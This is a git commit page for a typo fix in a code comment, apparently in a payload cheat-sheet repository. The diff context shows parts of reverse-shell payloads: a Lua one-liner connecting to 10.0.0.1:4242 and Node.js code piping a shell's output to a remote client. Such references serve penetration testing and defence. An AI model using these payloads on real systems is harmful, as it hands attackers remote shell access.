Merge pull request #519 from spidyhackx/patch-1

typo
This commit is contained in:
Swissky 2022-08-03 19:19:40 +02:00 committed by GitHub
commit fe1fa242ba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket")
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
}); });
return /a/; // Prevents the Node.js application form crashing return /a/; // Prevents the Node.js application from crashing
})(); })();